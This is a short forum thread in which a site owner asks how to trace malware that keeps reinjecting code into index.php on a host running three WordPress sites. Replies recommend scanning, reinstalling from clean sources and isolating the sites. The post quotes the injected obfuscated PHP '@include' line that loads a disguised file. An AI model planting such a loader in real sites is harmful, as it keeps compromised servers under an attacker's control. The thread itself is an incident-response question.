How to decode a malicious script?

S

sputnickk2019-03-17 10:52:59

JavaScript

sputnickk, 2019-03-17 10:52:59

Hello! Guys tell me how to determine the source of the virus.
There is a hosting, it has 3 WP sites, and at some intervals, the following insert appears in the index.php file of the root of one of the sites:

@include "\****\167w\***\141n\144o\162_\154i\1562\*\1544e\1646k\*\1643t\0456c\157m\057w\160-\141d\155i\156/\156e\164w\157r\153/\056c\0658\1457\0711\063.\151c\157";

I decode this code using https://malwaredecoder.com/ and see the path to the virus file, the contents of which are https://i.imgur.com/dkslnSo.png
but these symbols are percentages, I couldn’t figure out the numbers decode, seems to be similar to the URL decoded, but no. As I understand it, the function of this file is to create then such random files in the root of the sites - start34.php with the content - https://i.imgur.com/Hsyusb8.png That is, sabotage consists of such three parts.
I tried to load all the sites and go through them evisium.com/kb/scan_site_windows.html found a lot of everything, deleted it, but this rubbish still appears. Unloaded database dumps, searched for base64 and Evil entries, but the databases are clean

Reply

Answer the question

In order to leave comments, you need to log in

2 answer(s)

L

lamer350, 2019-03-17
@lamer350

You can’t track it all manually, go to virudie, scan all the files

O

OnYourLips, 2019-03-17
@OnYourLips

and with some periodicity in the index.php file of the root of one of the sites appears

Doesn't that bother you too much?
After zlomanado clean everything and install from the source, because the system is compromised.
And separate the sites into different containers, so they won’t get access to all through one.